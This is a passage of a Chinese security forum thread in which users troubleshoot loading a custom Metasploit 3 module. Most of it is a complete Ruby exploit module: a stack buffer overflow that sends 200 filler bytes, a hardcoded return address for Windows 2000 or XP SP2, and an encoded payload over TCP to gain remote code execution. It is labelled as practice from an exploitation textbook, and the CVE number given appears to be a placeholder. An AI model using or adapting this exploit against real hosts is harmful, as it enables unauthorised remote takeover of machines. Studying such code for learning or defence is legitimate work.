能力值:
( LV2,RANK:10 )
2 楼
##
# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
## require 'msf/core'
module Msf
class Exploits::Yangshuo::POC < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'YANGSHUO_POC',
'Version' => '1.0',
'Platform' => 'win',
'Privileged' => true,
'License' => MSF_LICENSE,
'Author' => 'yangshuo',
'Targets' => [
['Windows 2000', {'Ret' => [200 , 0x77e2307b] }],
['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }],
],
'DefaultTarget' => 0,
'Payload' => {
'Space' => 200,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Description' => %q{
this module is exploit practice of book
"Vulnerability Exploit and Analysis Technique"
used only for educational purpose
},
'Arch' => 'x86',
'References' => [
[ 'URL', 'http://www.failwest.com' ],
[ 'CVE', '44444' ],
],
'DefaultOptions' => { 'EXITFUNC' => 'process' }
))
end #end of initialize
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload...")
buf = 'a'*target['Ret'][0]
buf << [target['Ret'][1]].pack('V')
buf <<payload.encoded;
sock.put(buf)
handler
disconnect
end #end of exploit def
end
end
这是 修改FAILWEST的 代码所得的,你看看 必须符合MF3的标准才可以 上面那个ID,# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
class Exploits::Yangshuo::POC 这个类名一定要大写 要不报错!~~~~~
你试试吧 要不行 你在发帖!
总之一句话 你的东西得符合 MF3的 要求 要不他是不可能是别的
能力值:
( LV2,RANK:10 )
3 楼
我也遇到了,但是这个方法似乎没用,即使全都是大写也不行,我用的是3.3.4
能力值:
( LV2,RANK:10 )
4 楼
哥们那我怎么好使呢!~~~你把我的代码粘进去看看 不行 你再发贴!~~~